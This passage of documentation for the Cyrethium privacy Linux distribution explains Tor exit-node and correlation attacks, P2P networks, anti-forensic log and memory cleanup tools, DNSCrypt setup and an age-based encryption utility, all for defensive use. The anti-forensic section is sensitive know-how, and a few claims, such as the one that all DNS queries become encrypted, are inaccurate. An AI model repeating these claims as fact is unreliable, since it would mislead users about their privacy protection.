• Third-party libraries should be chosen carefully; a malicious or unmaintained module can create a security risk.

Conclusion

Python is the primary language preferred by developers in Cyrethium because it strikes a balance between security and accessibility. It provides both powerful integration at the system level and allows for the development of fast, readable, and reliable tools. When used correctly, Python is a strong, easy-to-maintain, and reliable foundation in terms of security.

Shell is the natural language of Linux systems. For many system administrators, security experts, and developers, Shell is the simplest way to speak directly with the system. In Linux-based projects like Cyrethium, Shell scripts are indispensable in terms of automation, system control, and privacy operations.

Why Shell?

Direct interaction with the system

Shell is the language closest to the kernel and basic Linux tools. It provides direct access to system resources, network configurations, and process management with commands like iptables, systemctl, grep, awk, sed, ps. This way, powerful operations can be performed without needing external libraries.

Lightweight and fast

It does not require compilation, dependencies, or large runtime environments. It is already present on every modern Linux system. This makes scripts both portable and minimal.

Ease of automation and system management

Tasks such as log cleaning, network configuration, service startup, or system maintenance can be done securely with a few lines of Bash script. Shell is suitable for the philosophy of "doing the job quickly, quietly, and effectively."

Ideal for privacy and security-focused operations

Shell is the most reliable method for sensitive tasks such as disk cleaning, log deletion, temporary file destruction, or system settings reset. Because the layer it operates on is directly at the operating system's control level.

Its Power in Linux Environment

Comes built-in:

All Debian-based systems include Shell interpreters like Bash or Dash by default. This way, scripts work the same in every environment.

Integration with tool chain:

Everything is a file in Linux; this gives Shell great flexibility. When scripts are used together with tools like grep, cut, tr, awk, sed, they can quickly accomplish even complex data processing tasks.

Ease of maintenance and debugging:

Shell scripts are plain text, so they are easy to read, edit, and test. Debugging can be done with commands like set -x or trap.

Shell's Security

Shell is a quite reliable language when run in a secure environment, but there are some points to be careful about:

Pros:

• Since the source code is open, hidden behaviors are easy to notice.
• Since it has few external dependencies, the attack surface is low.
• It provides high access control; it can be easily restricted through file permissions and user levels.

Cons:

• If user inputs are processed directly, command injection risk may arise.
• Error management can become difficult in large or complex projects.
• Incorrect use of variables can lead to unexpected results on the system (especially with commands like rm, eval, sudo).

Conclusion

Shell is the backbone of Linux. As the cornerstone of security, system control, and automation, it stands out with both its simplicity and power. Its ability to communicate directly with the system makes it one of the most reliable tools in privacy-focused systems. When written correctly, Shell scripts are fast, portable, auditable, and secure.

In the Cyrethium project, artificial intelligence (AI) is used as an auxiliary analysis tool in specific areas. The goal is not to replace the developer; it is to speed up development processes, increase code quality, and detect possible errors earlier. Artificial intelligence is never an independent decision-maker in Cyrethium — it always works as a supervised, limited-authority auxiliary module.

Areas Where Artificial Intelligence is Used

Code Analysis

Artificial intelligence detects erroneous structure, unnecessary complexity, or possible risky operations by scanning the source codes of developed tools. It examines the readability and structural consistency of the code. In this process, static analysis methods are combined with AI-based patterns.

Code Evaluation

AI evaluates the general design of the code; it offers suggestions in terms of functional consistency, logic errors, unnecessary repetitions, and modular structure. This evaluation is done automatically, but every suggestion is reviewed by the developer.

Performance Analysis

The code is analyzed through metrics such as efficiency, processing time, and resource usage. Artificial intelligence can detect sections that may create bottlenecks especially in Python and Shell scripts and suggest alternative solutions. This saves development time and facilitates optimization.

Security Analysis (Security Review)

AI can flag dangerous function calls, weak encryption methods, incorrect permission management, or lines that carry injection risk in the code. This system combines the classic "static code analyzer" logic with a suggestion system to help the developer.

Website and Simple Shell Scripts

Artificial intelligence is also used in organizing website content, correcting language errors, and writing simple Shell scripts. Since these types of operations are low-risk and predictable in structure, they can be carried out quite quickly and safely with AI assistance.

Areas Where Artificial Intelligence is Not Used

Artificial intelligence is only activated in certain, safe areas in Cyrethium. It is consciously not used in the following areas because these processes require high precision and deterministic behavior:

• Complex tool development processes
• Tor routing infrastructure and anonymity mechanisms
• System hardening operations
• ISO or system build process (build pipeline)

Using artificial intelligence in these areas is risky; even a small error can damage system integrity or compromise security. Therefore, all critical building blocks are created entirely manually, with human oversight.

A Realistic Assessment

Artificial intelligence is still inadequate in complex software architectures or low-level network operations. It has no decision-making mechanism of its own; it can make incorrect inferences in incorrect or incomplete contexts. Therefore, entrusting complex security tools, anonymity infrastructure, or system kernel configurations to AI would be technically irresponsible.

On the other hand, it saves serious time in simple scripts, debugging, and code optimization. Especially in areas such as reviewing repetitive tasks or small code pieces, artificial intelligence reduces the developer's workload. This way, human energy can be directed to more creative, strategic, and security-critical tasks.

Conclusion

Artificial intelligence is not an "automatic decision-maker" in Cyrethium, it is an "assistant." It does not replace humans; it helps humans direct their attention to more important issues. It can fail in complex systems, but when used in the right place, it increases productivity and raises the quality of development. The basic principle of security applies here too: control is always with humans.

When you use Tor or similar anonymity networks, your internet traffic passes through multiple relay nodes before reaching its destination. The last node in this chain is called the "exit node" — it's the point where your traffic leaves the Tor network and enters the regular internet.

What is an Exit Node Attack?

An exit node attack occurs when a malicious actor operates an exit node to intercept, monitor, or modify your traffic. Since the exit node can see the final destination and content of unencrypted traffic, it poses a significant privacy risk.

How Exit Node Attacks Work

When your data reaches the exit node, it's decrypted from Tor's encryption layers. If you're visiting an HTTP (not HTTPS) website, the exit node operator can:

• Read your traffic: See what websites you visit, what you search for, and what data you send.
• Steal credentials: Capture usernames, passwords, and session cookies if they're sent over unencrypted connections.
• Modify content: Inject malicious code, change website content, or redirect you to phishing sites.
• Track patterns: Analyze your browsing habits and timing patterns.

Real-World Risks

Studies have shown that a small percentage of Tor exit nodes are operated by malicious actors who actively sniff traffic. Some exit nodes have been caught:

• Harvesting login credentials from HTTP sites
• Injecting cryptocurrency mining scripts into web pages
• Redirecting users to fake banking sites
• Collecting email addresses and personal information

How to Protect Yourself

1. Always Use HTTPS

HTTPS encrypts your connection end-to-end, meaning even if the exit node is malicious, it cannot read or modify your traffic. Always check for the padlock icon in your browser.

2. Use HTTPS Everywhere

Browser extensions like HTTPS Everywhere automatically upgrade HTTP connections to HTTPS when possible, reducing exposure to exit node attacks.

3. Avoid Sensitive Activities on Tor

Don't log into important accounts (banking, email, social media) over Tor unless absolutely necessary. If you must, ensure the site uses HTTPS.

4. Use End-to-End Encryption

For messaging and file transfers, use tools with end-to-end encryption like Signal, PGP, or encrypted file sharing services.

5. Verify Certificates

Be alert for certificate warnings. A malicious exit node might attempt a man-in-the-middle attack by presenting fake certificates.

Cyrethium's Protection

Cyrethium includes hardened Firefox variants that:

• Enforce HTTPS connections whenever possible
• Warn about insecure connections
• Block mixed content (HTTP content on HTTPS pages)
• Provide strong certificate validation

Advanced Protection Techniques

Use Onion Services When Possible

Onion services (websites ending in .onion) provide end-to-end encryption within the Tor network. When you access an onion service, your traffic never leaves the Tor network, eliminating exit node risks entirely.

Implement Multi-Layer Encryption

For sensitive communications, use multiple layers of encryption:

• PGP/GPG for email encryption
• OTR or Signal Protocol for instant messaging
• VeraCrypt for file encryption before transfer

Monitor Your Connections

Use tools to verify your connections are secure:

• Check SSL/TLS certificate details
• Use browser extensions that show connection security
• Monitor for unexpected certificate changes

Real-World Exit Node Attack Examples

2007: Egerstad's Experiment

Security researcher Dan Egerstad operated several Tor exit nodes and captured thousands of email credentials from embassies and government organizations. This demonstrated that exit nodes could be used for mass surveillance of unencrypted traffic.

2020: Cryptocurrency Theft

Malicious exit nodes were caught modifying Bitcoin and cryptocurrency addresses in HTTP traffic, redirecting payments to attackers' wallets. This resulted in significant financial losses for users who didn't verify addresses.

SSL Stripping Attacks

Some exit nodes have attempted to downgrade HTTPS connections to HTTP, making traffic readable. Modern browsers now have protections against this, but it remains a concern.

How to Verify Exit Node Safety

Check Exit Node Reputation

Some organizations maintain lists of known malicious exit nodes. While Tor automatically avoids flagged nodes, staying informed helps you understand the threat landscape.

Use Tor Browser's Security Slider

Tor Browser includes a security slider that can be set to "Safest" mode, which:

• Disables JavaScript on all sites
• Blocks some fonts and symbols
• Disables video and audio playback
• Makes sites display only static content

Regularly Change Circuits

Don't use the same exit node for extended periods. Tor Browser allows you to request a new circuit (New Identity), which changes your exit node and makes long-term monitoring harder.

The Bottom Line

Exit node attacks are a real threat, but they're largely preventable. The key is to always use encrypted connections (HTTPS) and avoid sending sensitive information over unencrypted channels. Tor provides anonymity by hiding your identity and location, but it doesn't automatically encrypt your traffic to the final destination — that's your responsibility.

Remember: Tor is designed to protect your anonymity (who you are), not the content of your communications. Content protection is achieved through encryption (HTTPS, PGP, etc.). Use both together for complete protection.

Correlation attacks are one of the most sophisticated threats to anonymity networks like Tor. Unlike exit node attacks that focus on the content of your traffic, correlation attacks aim to identify who you are by analyzing patterns in network traffic.

What is a Correlation Attack?

A correlation attack works by observing traffic entering and leaving the Tor network, then using statistical analysis to match patterns. If an attacker can monitor both where traffic enters the network (entry node) and where it exits (exit node), they can potentially link the two and identify the user.

How Correlation Attacks Work

The basic principle is simple but powerful:

1. Traffic Observation

An attacker monitors network traffic at multiple points — ideally at both the entry and exit of the Tor network. This could be done by:

• Operating multiple Tor nodes (entry, middle, and exit)
• Compromising internet service providers (ISPs)
• Monitoring internet exchange points
• Controlling network infrastructure in certain regions

2. Pattern Analysis

The attacker analyzes characteristics of the traffic, such as:

• Timing: When packets are sent and received
• Volume: How much data is transferred
• Packet sizes: The size of individual data packets
• Traffic bursts: Patterns of activity and idle periods

3. Correlation

By comparing these patterns, the attacker tries to match traffic entering the network with traffic exiting it. If the patterns are similar enough, they can conclude that both streams belong to the same user.

Types of Correlation Attacks

Timing Correlation

This is the most common type. When you send a message through Tor, it takes a certain amount of time to travel through the network. By measuring when traffic enters and exits, an attacker can identify connections with matching timing patterns.

Volume Correlation

If you download a large file or stream video, the amount of data transferred creates a unique pattern. An attacker monitoring both ends can match these volume patterns to identify you.

Website Fingerprinting

Even with encryption, different websites have unique traffic patterns (page sizes, number of resources, loading sequences). An attacker can create "fingerprints" of websites and match them to your traffic.

Who Can Perform Correlation Attacks?

Correlation attacks require significant resources and are typically performed by:

• Nation-state actors: Governments with access to internet infrastructure
• Large ISPs: Companies that can monitor traffic at scale
• Well-funded organizations: Groups that can operate many Tor nodes

These attacks are not practical for average attackers due to the need for widespread network monitoring.

Limitations of Correlation Attacks

While powerful, correlation attacks have limitations:

• They require monitoring both entry and exit points
• They work better with longer observation periods
• They produce probabilistic results, not certainty
• They're less effective when many users are active simultaneously
• They can be disrupted by traffic padding and timing obfuscation

How to Defend Against Correlation Attacks

1. Use Bridges

Tor bridges are entry nodes that aren't publicly listed. Using bridges makes it harder for attackers to know you're using Tor and monitor your entry point.

2. Avoid Patterns

Don't use Tor at predictable times or for predictable durations. Vary your usage patterns to make correlation more difficult.

3. Use Additional Layers

Consider using VPN + Tor or Tor + VPN combinations to add extra layers that make correlation harder (though this has trade-offs).

4. Limit Session Length

Shorter sessions provide less data for correlation. Don't stay connected for hours at a time if you can avoid it.

5. Avoid High-Bandwidth Activities

Streaming video or downloading large files creates distinctive patterns. Use Tor primarily for browsing and messaging.

Cyrethium's Approach

Cyrethium helps mitigate correlation attacks by:

• Supporting Tor bridge configuration
• Providing tools to manage Tor circuits
• Implementing traffic isolation between applications
• Offering guidance on safe usage patterns

Advanced Mitigation Techniques

Traffic Padding and Obfuscation

Some advanced techniques can make correlation harder:

• Constant-rate traffic: Send dummy packets to maintain consistent traffic flow
• Random delays: Add random delays between packets to disrupt timing patterns
• Traffic morphing: Make your traffic look like normal web browsing

Note: These techniques are mostly implemented at the network level and may impact performance.

Use Pluggable Transports

Pluggable transports disguise Tor traffic as other types of traffic:

• obfs4: Makes Tor traffic look random and unidentifiable
• meek: Tunnels Tor through HTTPS connections to popular websites
• Snowflake: Uses temporary proxies provided by volunteers

Compartmentalize Your Activities

Don't mix different activities in the same Tor session:

• Use separate Tor sessions for different identities
• Don't browse personal sites and anonymous sites in the same session
• Restart Tor Browser between different activities

Real-World Correlation Attack Cases

Operation Onymous (2014)

Law enforcement agencies used traffic correlation to identify and shut down multiple dark web marketplaces. While the exact methods remain classified, it's believed they monitored both entry and exit traffic over extended periods.

Academic Research Demonstrations

Researchers have successfully demonstrated correlation attacks in controlled environments:

• Identifying users with 90%+ accuracy when controlling 10% of network nodes
• De-anonymizing users through website fingerprinting with machine learning
• Tracking users across sessions using timing analysis

The Silk Road Case

While Ross Ulbricht's capture involved multiple factors, traffic analysis played a role in the investigation. This case highlighted that even sophisticated Tor users can be identified through persistent monitoring and correlation.

Understanding Your Threat Model

Low-Resource Attackers

Individual hackers or small groups typically cannot perform correlation attacks. They lack the infrastructure to monitor multiple network points simultaneously.

Medium-Resource Attackers

Large corporations or well-funded criminal organizations might attempt correlation attacks but face significant technical and legal barriers.

High-Resource Attackers

Nation-states and intelligence agencies have the capability to perform sophisticated correlation attacks:

• Access to internet backbone infrastructure
• Ability to operate multiple Tor nodes
• Advanced traffic analysis tools and expertise
• Legal authority to compel ISPs to provide data

Practical Defense Strategy

Layer Your Defenses

1. Use Tor correctly: Follow best practices and avoid common mistakes
2. Add bridges: Hide the fact that you're using Tor
3. Limit session duration: Don't stay connected for hours
4. Vary your patterns: Don't use Tor at the same time every day
5. Use additional tools: Consider VPN + Tor for extra protection

Operational Security (OPSEC)

Technical defenses alone aren't enough. Good OPSEC is crucial:

• Never reveal personal information
• Don't reuse usernames or passwords
• Be consistent with your anonymous identity
• Avoid time zone leaks in communications
• Don't mix anonymous and personal activities

The Reality Check

Correlation attacks are a serious threat, but they require substantial resources and expertise. For most users, the risk comes from more mundane mistakes like:

• Logging into personal accounts over Tor
• Using the same username across clearnet and Tor
• Revealing identifying information in communications
• Not using HTTPS
• Poor operational security practices

Focus on basic operational security first, then worry about advanced attacks.

Key Takeaway: Correlation attacks are theoretically possible but practically difficult. If you're facing a nation-state adversary, Tor alone may not be sufficient. However, for most users protecting against surveillance, tracking, and censorship, Tor combined with good OPSEC provides strong protection.

Peer-to-Peer (P2P) networks are decentralized systems where participants (peers) communicate directly with each other without relying on central servers. Unlike traditional client-server models, P2P networks distribute both data and processing across all participants.

How P2P Networks Work

In a P2P network, every participant acts as both a client and a server. When you want to access a resource:

1. Your computer connects to the P2P network
2. You search for the resource you need
3. The network helps you find peers who have that resource
4. You download directly from those peers
5. While downloading, you also share what you have with others

Types of P2P Networks

Unstructured P2P

Peers connect randomly without any organized structure. Examples include early file-sharing networks like Gnutella. These are simple but inefficient for finding specific content.

Structured P2P (DHT)

Uses Distributed Hash Tables (DHT) to organize data efficiently. Each peer is responsible for a specific range of data. BitTorrent and IPFS use this approach. It's more efficient but more complex to implement.

Hybrid P2P

Combines P2P with some central coordination. For example, BitTorrent uses trackers (central servers) to help peers find each other, but the actual file transfer is P2P.

Advantages of P2P Networks

1. Decentralization

No single point of failure. If some peers go offline, the network continues functioning. This makes P2P networks resilient to censorship and attacks.

2. Scalability

As more peers join, the network becomes stronger and faster. Each new peer adds resources rather than consuming them from a central server.

3. Cost Efficiency

No need for expensive server infrastructure. The network's capacity grows organically with its user base.

4. Censorship Resistance

Difficult to shut down since there's no central authority. Content is distributed across many peers in different locations.

Challenges of P2P Networks

1. Bootstrap Problem

How does a new peer find the network? P2P networks need some initial connection points (bootstrap nodes) to get started. If these are blocked or unavailable, joining becomes difficult.

2. NAT Traversal

Most home internet connections use NAT (Network Address Translation), which makes direct peer-to-peer connections difficult. P2P networks need techniques like hole punching or relay nodes to work around this.

3. Security Concerns

• Sybil Attacks: An attacker creates many fake identities to gain control of the network
• Eclipse Attacks: Isolating a peer by surrounding it with malicious nodes
• Data Poisoning: Distributing corrupted or malicious data
• Privacy Leaks: Your IP address is visible to peers you connect with

4. Performance Issues

Finding content can be slow, especially in unstructured networks. Not all peers have good bandwidth or stay online consistently.

P2P and Privacy

P2P networks have complex privacy implications:

Privacy Advantages:

• No central server logging your activities
• Difficult to monitor the entire network
• Content is distributed, not centrally stored

Privacy Risks:

• Your IP address is visible to peers
• Monitoring nodes can track who requests what
• Traffic analysis can reveal patterns
• Some P2P protocols leak metadata

P2P in Anonymity Networks

Some anonymity networks use P2P principles:

I2P (Invisible Internet Project)

A fully P2P anonymity network where all participants route traffic for each other. Unlike Tor's directory-based approach, I2P uses a distributed network database.

Freenet

A P2P platform designed for censorship-resistant publishing. Content is distributed across the network and can't be removed by any single party.

Advantages for Anonymity:

• No central directories to compromise
• Harder to map the entire network
• More resilient to attacks

Challenges for Anonymity:

• More complex to secure properly
• Slower performance
• Harder to analyze security properties

Using P2P Safely

1. Use a VPN or Proxy

Hide your real IP address from other peers. This is especially important for file-sharing P2P networks.

2. Verify Content

Always check hashes and signatures of downloaded content to ensure it hasn't been tampered with.

3. Limit Exposure

Don't share sensitive personal files on P2P networks. Assume anything you share will become public.

4. Use Encryption

Choose P2P applications that encrypt traffic between peers to prevent eavesdropping.

5. Be Aware of Legal Issues

Some P2P activities may be illegal in your jurisdiction. Understand the laws before participating.

P2P in Cyrethium

Cyrethium includes support for privacy-focused P2P networks:

• I2P: Pre-configured for anonymous P2P communication
• Tor: Can be used with some P2P applications (though not recommended for high-bandwidth activities)

The Future of P2P

P2P technology continues to evolve:

• Blockchain: Cryptocurrencies use P2P networks for decentralized consensus
• IPFS: A P2P file system aiming to replace HTTP
• Decentralized social media: Platforms like Mastodon use federated P2P principles
• Mesh networks: P2P networks that can work without internet infrastructure

Modern P2P Applications

Cryptocurrency and Blockchain

Bitcoin and other cryptocurrencies use P2P networks for:

• Transaction broadcasting: Sharing new transactions across the network
• Block propagation: Distributing new blocks to all nodes
• Consensus: Agreeing on the state of the blockchain without central authority

This creates a trustless system where no single entity controls the currency.

Decentralized File Storage

IPFS (InterPlanetary File System):

• Content-addressed storage where files are identified by their hash
• Automatic deduplication across the network
• Permanent web - content can't be deleted if someone hosts it
• Faster downloads by fetching from multiple peers

Filecoin: Adds economic incentives to IPFS, paying users to store others' data.

Decentralized Communication

Matrix Protocol:

• Federated chat system with no central server
• End-to-end encryption by default
• Bridges to other platforms (Discord, Telegram, Slack)

Briar:

• P2P messaging that works without internet
• Uses Bluetooth, WiFi, and Tor for connections
• Perfect for censored environments

P2P Security Best Practices

For File Sharing

1. Always verify hashes: Check file integrity before opening
2. Use a VPN: Hide your IP from other peers
3. Scan downloads: Run antivirus on all downloaded files
4. Limit upload bandwidth: Prevent your connection from being overwhelmed
5. Use reputable clients: Stick to well-known, open-source P2P software

For Cryptocurrency

1. Run your own node: Don't trust third-party nodes with your transactions
2. Use Tor: Hide your IP when broadcasting transactions
3. Verify connections: Ensure you're connected to legitimate peers
4. Keep software updated: Protect against known vulnerabilities

For Anonymous Communication

1. Verify identities: Use key fingerprints to confirm contacts
2. Enable encryption: Always use end-to-end encryption
3. Minimize metadata: Use protocols that hide who talks to whom
4. Regular key rotation: Change encryption keys periodically

P2P vs Traditional Networks

When P2P is Better:

• Need for censorship resistance
• Distributing large files to many users
• Building systems that must survive attacks
• Creating trustless environments
• Reducing infrastructure costs

When Traditional is Better:

• Need for guaranteed performance
• Require strong consistency guarantees
• Need centralized control and moderation
• Building simple applications quickly
• Serving latency-sensitive content

The Future of P2P

Web3 and Decentralized Web

The next generation of the internet is being built on P2P principles:

• Decentralized identity: Control your own identity without relying on companies
• Decentralized storage: Store data across the network, not on company servers
• Decentralized computing: Run applications on distributed networks
• Decentralized finance (DeFi): Financial services without banks

Mesh Networks

P2P networks that work without internet infrastructure:

• Devices connect directly to nearby devices
• Create local networks in areas without internet
• Provide communication during disasters or censorship
• Examples: NYC Mesh, Freifunk, Guifi.net

Edge Computing

Combining P2P with edge computing for:

• Faster content delivery by caching at the edge
• Reduced latency for real-time applications
• More efficient use of network resources

Common P2P Misconceptions

Myth: P2P is only for piracy

Reality: P2P is a neutral technology used for many legitimate purposes including software distribution (Linux ISOs), scientific data sharing, and decentralized applications.

Myth: P2P is always anonymous

Reality: Most P2P networks expose your IP address. You need additional tools (VPN, Tor) for anonymity.

Myth: P2P is slow

Reality: P2P can be faster than traditional downloads because you download from multiple sources simultaneously.

Myth: P2P networks can't be controlled

Reality: While harder to shut down, P2P networks can still be attacked through Sybil attacks, legal pressure, or infrastructure blocking.

Conclusion

P2P networks offer powerful decentralization and resilience, but they come with complexity and security challenges. When designed well, they can provide censorship resistance and scalability. However, they require careful implementation to protect user privacy and security. Understanding how P2P networks work helps you use them safely and effectively.

Key Takeaway: P2P is not just a technology for file sharing - it's a fundamental architecture for building decentralized, resilient systems. As the internet evolves, P2P principles are becoming increasingly important for privacy, freedom, and innovation.

Cyrethium includes a suite of anti-forensic utilities designed to reduce user privacy and data persistence. These tools target temporary data, swap contents, RAM traces, logs, and temporary files that may remain during system shutdown/logout processes. These features are optional and controlled centrally through a management tool.

Note: Anti-forensic measures can make data recovery difficult or impossible. Developers accept no responsibility for the use of this tool.

What Do Anti-Forensic Settings Do?

RAM Cleaning/Encryption (on-shutdown RAM scrub)

High-level cleaning processes are applied to reduce the impact of temporary data (memory representations) held in kernel/user space during shutdown.

Swap/Hibernation Cleanup

Active swap areas and hibernation (suspend-to-disk) files (if any) are securely handled at shutdown or reboot.

Temporary Directories and tmp Cleanup

/tmp, user temp directories, application temporary folders, and caches are targeted.

Log Rotation and Cleanup

Unnecessary details and old entries in system, application, and user logs are processed according to secure policies.

Journalctl & systemd Log Management

Compatible with journal configuration, reducing to the minimum required information level in traditional logs and defining client-side buffer cleanup operations.

Warnings

Data Loss Risk

Aggressive cleaning can cause permanent data loss. Always backup important data.

Performance Impact

Deep cleaning processes can extend shutdown time and may briefly affect system stability in some cases.

Compatibility

Hibernation/swap policies may cause unexpected behavior on some systems — test device/driver compatibility.

DNSCrypt-Proxy is a local DNS resolver that encrypts DNS queries and optionally redirects them to modern protocols like caching, filtering, or DNS-over-HTTPS/DoT. Purpose: Prevent DNS queries from being observed, modified, or manipulated.

Core Components

Local Proxy (dnscrypt-proxy) Service

Listens on 127.0.0.1:53 or another port and receives DNS requests from applications.

Resolver Providers

Remote resolvers supporting DNSCrypt, DoH (DNS-over-HTTPS), DoT (DNS-over-TLS).

Cache and Filtering Layer

Caches responses; can also apply hosts-based blocking or RPZ-style filtering.

How It Works — Step by Step

1. Application makes a DNS query (e.g., example.com).
2. Query goes to local dnscrypt-proxy (routed via system DNS settings / resolv.conf or systemd-resolved compatible).
3. dnscrypt-proxy sends the query to the selected remote resolver over a secure channel (DoH/DoT/DNSCrypt).
4. Remote resolver's response comes back; proxy caches the response and returns it to the client.

Security/Critical Points

Query Privacy

DNS queries are encrypted, making it harder for ISPs and intermediaries to monitor queries. However, the target IP address and traffic are still visible — DNS privacy alone does not provide complete anonymity.

Metadata Leakage

Remote resolver selection is important; a single resolver can see all your queries. Preferred method: use trusted, multiple, or rotational resolvers.

Application Notes for Cyrethium

Filtering

Use ad/telemetry/tracker block lists — but remember these lists can produce false positives.

Overview

DNSCrypt Manager is a tool that protects your privacy by encrypting your DNS queries. It provides secure and anonymous DNS resolution using DNSCrypt-proxy.

Usage

cryethium-dnscrypt

Main Menu

1. Start DNSCrypt (Onetime)

Starts DNSCrypt once for testing or temporary use.

Use Cases: Testing purposes, temporary use, configuration check

Note: Stops when system is restarted.

2. Set DNSCrypt Service (Autostart)

Installs DNSCrypt service and enables automatic startup.

Features: Starts automatically at system boot, persistent configuration, systemd integration

3. Restart DNSCrypt Service

Restarts the DNSCrypt service.

When to Use: After configuration changes, during connection issues, after server changes

4. Remove DNSCrypt Service

Stops and removes the DNSCrypt service.

Actions: Stops the service, disables automatic startup, preserves configuration (does not delete)

5. Check DNSCrypt

Checks DNSCrypt configuration.

Checks: Configuration file validity, current DNS servers, test query (example.com)

6. Check DNSCrypt Service Status

Shows DNSCrypt service status.

Information Displayed: Service status (active/inactive), uptime, recent logs, error messages

7. Exit

Exits the program.

Configuration

Configuration File Location: /etc/dnscrypt-proxy/dnscrypt-proxy.toml

Popular Servers:

• cloudflare: Cloudflare DNS (1.1.1.1)
• google: Google DNS (8.8.8.8)
• quad9: Quad9 DNS (9.9.9.9)
• adguard: AdGuard DNS (ad blocking)

DNS Leak Testing

Test Methods

1. Online Test

# In browser:
https://dnsleaktest.com/
https://www.dnsleaktest.org/

2. Command Line

# Check current DNS server
nslookup google.com

# Should see DNSCrypt server (127.0.0.1)

3. Test with DNSCrypt

sudo dnscrypt-proxy -resolve example.com

Troubleshooting

DNSCrypt Won't Start

Problem: Service won't start

# Stop conflicting service
sudo systemctl stop systemd-resolved

# Start DNSCrypt
sudo systemctl start dnscrypt-proxy

DNS Not Resolving

Problem: Cannot access websites

# Check DNSCrypt status
sudo systemctl status dnscrypt-proxy

# Check configuration
sudo dnscrypt-proxy -check

# Restart service
sudo systemctl restart dnscrypt-proxy

Slow DNS Resolution

Problem: DNS queries are slow

# Select faster server
sudo nano /etc/dnscrypt-proxy/dnscrypt-proxy.toml

# Change server_names:
server_names = ['cloudflare']

# Restart service
sudo systemctl restart dnscrypt-proxy

Configuration Error

Problem: "Configuration check failed"

# Check configuration
sudo dnscrypt-proxy -check

# Fix syntax error
sudo nano /etc/dnscrypt-proxy/dnscrypt-proxy.toml

# Restore default configuration
sudo cp /etc/dnscrypt-proxy/dnscrypt-proxy.toml.example /etc/dnscrypt-proxy/dnscrypt-proxy.toml

Advanced Configuration

Ad Blocking

[blocked_names]
blocked_names_file = '/etc/dnscrypt-proxy/blocked-names.txt'

blocked-names.txt:

# Ad servers
ads.google.com
doubleclick.net
adserver.com

Custom Server Addition

[static.'my-server']
stamp = 'sdns://...'

Fallback DNS

fallback_resolver = '9.9.9.9:53'

Query Logging

[query_log]
file = '/var/log/dnscrypt-proxy/query.log'
format = 'tsv'

Performance Optimization

Cache Settings

cache = true
cache_size = 1024
cache_min_ttl = 3600
cache_max_ttl = 86400
cache_neg_min_ttl = 60
cache_neg_max_ttl = 600

Server Selection

# Auto-select fastest servers
server_names = []

# Maximum latency (ms)
timeout = 2500

# Number of servers
max_clients = 250

Frequently Asked Questions

Q: Can DNSCrypt be used with VPN?
A: Yes, but if VPN already provides DNS encryption, it may be redundant.

Q: Are all DNS queries encrypted?
A: Yes, all system-wide DNS queries are encrypted.

Q: Is there a performance impact?
A: Minimal impact, but speed increases with caching.

Q: Which server should I choose?
A: Cloudflare or Google are fast and reliable.

Q: What is DNSSEC?
A: Security protocol that verifies DNS response authenticity.

Q: What are no-log servers?
A: Servers that don't keep logs of your DNS queries.

Q: Can it be used with Tor?
A: Yes, but Tor already provides DNS encryption.

Security Notes

Important

1. Trusted Servers: Only use trusted DNS servers
2. DNSSEC: Always enable DNSSEC validation
3. No-Log: Prefer servers that don't keep logs
4. Updates: Keep DNSCrypt-proxy updated

Overview

Fangbullcrypt is a modern file and message encryption application using the age encryption tool. It supports public key and passphrase-based encryption.

Usage

fangbullcrypt

Main Menu

1-2. Key Management

1. Generate New Key Pair

Creates a new age key pair.

Steps:

1. Enter key pair name
2. Private and public keys are generated
3. Secure permissions are set (600)

Output:

Private key: ~/.fangbull/keys/mykey_private.key
Public key: ~/.fangbull/keys/mykey_public.key
Public key content: age1xxxxxxxxxxxxxx

2. List Existing Keys

Lists existing key pairs.

Shows: Key pair name, private key path, public key path, public key content

3-4. File Operations

3. Encrypt File

Encrypts a file.

With Public Key:

1. Enter file path
2. Output path (optional)
3. Select "1" (Use existing public key)
4. Select key pair
5. File is encrypted (.age extension)

With Passphrase:

1. Enter file path
2. Output path (optional)
3. Select "2" (Use passphrase)
4. Enter passphrase (twice)
5. File is encrypted

4. Decrypt File

Decrypts a file.

With Private Key:

1. Encrypted file path
2. Output path (optional)
3. Select "1" (Use private key)
4. Select key pair
5. File is decrypted

With Passphrase:

1. Encrypted file path
2. Output path (optional)
3. Select "2" (Use passphrase)
4. Enter passphrase
5. File is decrypted

5-6. Message Operations

5. Encrypt Message

Encrypts a text message.

Usage:

1. Select "1" or "2" (Public key / Passphrase)
2. Enter message (Ctrl+D to finish)
3. Encrypted message is displayed

Example Output:

-----BEGIN AGE ENCRYPTED FILE-----
YWdlLWVuY3J5cHRpb24ub3JnL3YxCi0+IFgyNTUxOSBxRjVqVGhWL2RxZGZHdGFV
...
-----END AGE ENCRYPTED FILE-----

6. Decrypt Message

Decrypts an encrypted message.

Usage:

1. Select "1" or "2" (Private key / Passphrase)
2. Paste encrypted message (Ctrl+D to finish)
3. Decrypted message is displayed

7. Secure Delete File

Securely deletes a file.

Process:

1. Enter file path
2. Confirm (yes)
3. File is overwritten 3 times with random data
4. File is deleted

Warning: This operation is irreversible!

Age Encryption

What is it?

Age is a modern and simple file encryption tool. It works similar to SSH keys.

Advantages

• Simple: Easy to use
• Secure: Modern cryptography (X25519, ChaCha20-Poly1305)
• Fast: High performance
• Portable: Single binary

Public Key Format

age1xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Decryption Failed

Problem: Decryption failed

Solution:

• Ensure correct key/passphrase is used
• File must not be corrupted
• Age version must be compatible

Frequently Asked Questions

Q: How secure is Age?
A: Uses modern cryptography (X25519, ChaCha20-Poly1305), industry standard.

Q: Is it safe to share public keys?
A: Yes, public keys can be shared. Private keys should never be shared.

Q: What if I forget my passphrase?
A: File cannot be recovered, lost if no backup exists.

Q: Can large files be encrypted?
A: Yes, age uses streaming encryption, no file size limit.

Q: Can encrypted files be opened on other systems?
A: Yes, can be opened on any system with age installed.

Q: Is multiple recipient supported?
A: Yes, you can encrypt with multiple public keys.

Security Notes

Important

1. Private Key: Never share or lose it
2. Passphrase: Use strong and memorable password
3. Backup: Backup keys and important files
4. Secure Delete: Securely delete original files

Cyrethium Root0 Edition's default Firefox variant is based on Amnesic Firefox. For more information, please review the Amnesic Firefox documentation.

I2P (Invisible Internet Project) is an anonymous, peer-to-peer network layer. Its primary purpose is to provide anonymous access to services hosted within I2P (eepsites, mail, bittorrent, etc.) and to other I2P users. Unlike Tor, I2P is more suitable for fully in-network services; clearnet exit (outproxy) is limited.

Core Components

Router (I2P node): Each user runs their own I2P router which acts as both client and relay.

Tunnels: Traffic uses bidirectional tunnels for routing - inbound and outbound tunnels. Each tunnel contains a series of hops.

